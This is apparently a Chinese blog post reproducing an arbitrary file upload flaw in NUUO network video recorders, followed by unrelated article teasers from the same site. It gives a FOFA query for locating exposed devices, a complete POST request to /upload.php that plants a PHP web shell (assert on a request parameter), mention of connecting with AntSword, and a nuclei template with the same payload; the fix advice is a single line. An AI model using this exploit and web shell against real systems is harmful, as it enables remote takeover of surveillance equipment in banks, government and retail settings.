NUUO网络视频录像机upload.php任意文件上传漏洞复现

ops/2024/11/1 14:10:09/

文章目录

    • 免责声明
    • 漏洞描述
    • 搜索语法
    • 漏洞复现
    • nuclei
    • 修复建议

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

NUUO网络视频录像机(Network Video Recorder,简称NVR)是NUUO Inc.生产的一种专业视频监控设备,它广泛应用于零售、交通、教育、政府和银行等多个领域。能够同时管理多个IP摄像头,实现视频录制、存储、回放及远程监控等功能。它采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求。在upload接口处存在文件上传漏洞

在这里插入图片描述

搜索语法

fofa

body="www.nuuo.com/eHelpdesk.php"

漏洞复现

在接口处进行文件上传 /upload.php

POST /upload.php HTTP/1.1
Host: 
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------ok4o88lom
accept: */*
Content-Length: 163----------ok4o88lom
Content-Disposition: form-data; name="userfile"; filename="test.php"<?php $code=$_REQUEST['777'];
assert($code);?>
----------ok4o88lom--

在这里插入图片描述

访问test.php 文件使用蚁剑进行测试
在这里插入图片描述

nuclei

id: NUUO-Network-Camera-uploadfileinfo:name: uploadfile of NUUOauthor: xlseverity: infotags: tagshttp:- raw:- "POST /upload.php HTTP/1.1\nHost: \nCache-Control: max-age=0\nAccept-Language:\\ zh-CN\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT\\ 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100\\ Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\n\Accept-Encoding: gzip, deflate, br\nConnection: keep-alive\nContent-Type:\\ multipart/form-data; boundary=--------ok4o88lom\naccept: */*\nContent-Length:\\ 163\n\n----------ok4o88lom\nContent-Disposition: form-data; name=\"userfile\"\; filename=\"test.php\"\n\n<?php $code=$_REQUEST['777'];\nassert($code);?>\n\----------ok4o88lom--"matchers-condition: andmatchers:- type: wordpart: bodywords:- test.php- type: statusstatus:- 200

修复建议

升级到最新版本


http://www.ppmy.cn/ops/130156.html

相关文章

基于单片机的库房环境监测控制系统设计

库房环境监测控制系统的核心主控芯片为STC89C52&#xff0c;该系统硬件由温湿度模块、烟雾检测模块、人体检测模块、按键模块、电源模块、显示模块和报警模块组成。当温湿度高于或低于设定值时&#xff0c;启动执行机构进行升温降温、除湿加湿&#xff0c;除此之外&#xff0c;…

SpringBoot抗疫物资管理系统:技术架构解析

第三章 系统分析 整个系统的功能模块主要是对各个项目元素组合、分解和更换做出对应的单元&#xff0c;最后在根据各个系统模块来做出一个简单的原则&#xff0c;系统的整体设计是根据用户的需求来进行设计的。为了更好的服务于用户要从抗疫物资管理系统的设计与实现方面上做出…

C++ 代码工程化

在C中进行代码工程化通常涉及多个步骤&#xff0c;以确保代码的可维护性、可扩展性和可重用性。以下是一些关键步骤和最佳实践&#xff1a; 1. 项目结构 目录组织&#xff1a;将源代码、头文件、第三方库、测试、文档和其他资源分开。例如&#xff1a; MyProject/ ├── sr…

blender 小车建模 建模 学习笔记

一、学习blender视频教程链接 案例4&#xff1a;狂奔的小车_建模_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Bt4y1E7qn?p14&spm_id_from333.788.videopod.episodes&vd_sourced0ea58f1127eed138a4ba5421c577eb1 二、开始建模 &#xff08;1&#xff09;创…

Web3:揭开去中心化互联网的未来面纱

随着科技的迅猛发展&#xff0c;互联网经历了多个阶段的演变。如今&#xff0c;Web3的概念正逐渐浮出水面&#xff0c;承诺带来一个去中心化、开放和用户主权的互联网新时代。Web3不仅是技术上的革新&#xff0c;更是对互联网的根本性重塑&#xff0c;意味着用户的权利和数据掌…

IBM Rational DOORS9.6.1.11安装

文章目录 IBMRationalDOORS9.6.1.11安装1. 软件安装及说明1. 软件安装包2. 说明 2. Doors Server安装3. Doors Client安装1. 先决条件2. Doors Client安装 4. 启动客户端 IBMRationalDOORS9.6.1.11安装 1. 软件安装及说明 1. 软件安装包 2. 说明 两个应用程序服务端和客户端&…

哈尔滨三级等保信息安全风险管理指南

随着信息技术的迅猛发展&#xff0c;信息安全问题日益凸显&#xff0c;尤其是在政府、金融、医疗等重要领域。为了保障信息系统的安全性&#xff0c;哈尔滨市依据国家信息安全等级保护&#xff08;等保&#xff09;制度&#xff0c;制定了三级等保信息安全风险管理指南。本文将…

《大数据与人工智能:提升数据质量与数量的利器》

《大数据与人工智能&#xff1a;提升数据质量与数量的利器》 一、大数据与人工智能的融合趋势二、大数据增加数据数量的方法&#xff08;一&#xff09;不同途径的数据增量&#xff08;二&#xff09;数据增强的多样方法 三、人工智能提升数据数量的手段&#xff08;一&#xf…